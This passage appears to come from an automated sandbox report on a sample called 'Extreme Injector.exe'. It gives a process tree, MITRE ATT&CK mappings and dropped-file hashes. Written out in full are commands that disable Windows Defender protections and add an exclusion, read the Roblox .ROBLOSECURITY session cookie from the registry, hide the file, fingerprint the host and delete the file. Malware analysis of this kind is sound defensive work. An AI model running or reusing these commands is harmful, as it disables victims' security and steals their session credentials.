        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        22⤵
        Detects videocard installed
        
        PID:4228
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4160
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        20⤵
        Executes dropped EXE
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        19⤵
        Executes dropped EXE
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        18⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2840
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        19⤵
        Views/modifies file attributes
        
        PID:2200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        19⤵
        
        PID:4408
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        19⤵
        
        PID:1076
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        19⤵
        Detects videocard installed
        
        PID:1852
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3780
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        17⤵
        Executes dropped EXE
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        16⤵
        Executes dropped EXE
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        15⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4384
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        16⤵
        Views/modifies file attributes
        
        PID:4868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        16⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        16⤵
        
        PID:3176
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        16⤵
        
        PID:4024
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:3312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        16⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3100
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        16⤵
        Detects videocard installed
        
        PID:5084
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4196
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1028
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        14⤵
        Executes dropped EXE
        
        PID:1384
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        13⤵
        Executes dropped EXE
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        12⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4544
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        13⤵
        Views/modifies file attributes
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        13⤵
        
        PID:2448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        13⤵
        
        PID:3924
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:3256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3568
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        13⤵
        Detects videocard installed
        
        PID:3164
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3660
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        11⤵
        Executes dropped EXE
        
        PID:3616
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        10⤵
        Executes dropped EXE
        
        PID:2832
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        9⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2300
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        10⤵
        Views/modifies file attributes
        
        PID:4092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4032
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        10⤵
        
        PID:1152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        10⤵
        
        PID:468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:4800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4404
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        10⤵
        Detects videocard installed
        
        PID:392
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2192
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4812
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        8⤵
        Executes dropped EXE
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        7⤵
        Executes dropped EXE
        
        PID:3788
      - C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2692
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3984
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:1720
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:1560
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:3740
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:448
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4048
    - - C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
        5⤵
        Executes dropped EXE
        
        PID:1924
  - - C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
      "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
      4⤵
      Executes dropped EXE
      PID:1552
- - C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
    "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
    3⤵
    - Executes dropped EXE
    PID:2428
- C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe
  "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:964
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe"
    3⤵
    - Views/modifies file attributes
    PID:2060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4228
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5072
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3656
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2988
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2884
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Extreme Injector.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:5000
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Extreme Injector v3.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Extreme Injector.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9b44063b66cadb38e23065965ce619eb

SHA1
85dae1fcd9fe161846b3a0e7af439b6788a82c57

SHA256
167430aa8754a480522a7d9487ed9633474cbdb4ca6d64b2c4c75119a637dd73

SHA512
88cbd935ebb72e891e218d81bfb1e06b6db4d52205532650d5b0775a05f452be3785742ec94849da5cf6cc66a4e0bef7130b2a573851b8d0dfe4cc970738c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
e2a7fc20b443bab1d5f443e5cced0003

SHA1
fd875f15cf9bdea6d2e507365529fe151e26e399

SHA256
b977c66cd381a362076f0634005a18dbe3644cacb8d17f710076f39fb9e8d72f

SHA512
0442337dde316986c1b637ec1ee54159521a6b5b45cb1d6dcb07e16abd1babdd688d13132300f85e716c80c916f0e3ec04cf538a08a21a1efbf6737d6944ebed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
28ef595a6cc9f47b8eccb22d4ed50d6c

SHA1
4335de707324b15eba79017938c3da2752d3eea5

SHA256
3abd14d4fe7b5697b2fa84993e7183f4fd2580be5b4e5150da15ddda5a9560b9

SHA512
687b7849faa62a4dabc240b573afa163f0cda9a80be61cebe28ef1461777744d73b465ac92d065093228068540846e79c899445057f5b906f9b9fa9868132208

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7511c81925750deb7ad1b9b80eea8a8d

SHA1
6ea759b3cbd243ae11435c6d6c5ced185eb01f49

SHA256
5b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa

SHA512
5f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b79eba6da7413efa3073c1847c013c43

SHA1
8064312a89143475e20a7ef921b586bcfcce052b

SHA256
22afc01e3ae9c96fc2e2b1aa37c821dd94dcf5db576f327eae9c09cb815a97bd

SHA512
f5d1a509e3e21a537a25f948afe34c1ac7a554fa325ee9cbc53df0ba3122f1ec4b32841efeaeba2500595525e22b79c9cfadacf1e11335e7a4444ad3138ca057

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
985b3105d8889886d6fd953575c54e08

SHA1
0f9a041240a344d82bac0a180520e7982c15f3cd

SHA256
5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

SHA512
0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ca58d1913d3261f116a299095e04f734

SHA1
941d13d0c8c65adb6513f23991acfa0d62facdea

SHA256
755daf72f2f5e983abb009c3b1eef4c7c660999f5ff581545bbcae7088c17c69

SHA512
87b0d8c9a5348235e9ad6416e09665764db1af408bf763857dc40e39411fa0cf405e3e8b9f0b8540c72aa874059d1dee865aa0cff8dba0fde5779ec9480b5e40

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8ba9028bd2cc34e4b9e0dbb5f456d76c

SHA1
2b15558bd7508b35d5354dd6996d08058598ff46

SHA256
67d79ed8df784f2a359055c794146c60597c34f08599b40908f5208de7d3b2c3

SHA512
f33c315f00f952f72ecd5c6fb7d377fc4b6139e1c6b282ba0f52a839b1c7f3016a90a39e25a7e322570b72e1324ecbadd0dd53eead06dc5915662b94d1ffbd23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
1a58f982c18490e622e00d4eb75ace5a

SHA1
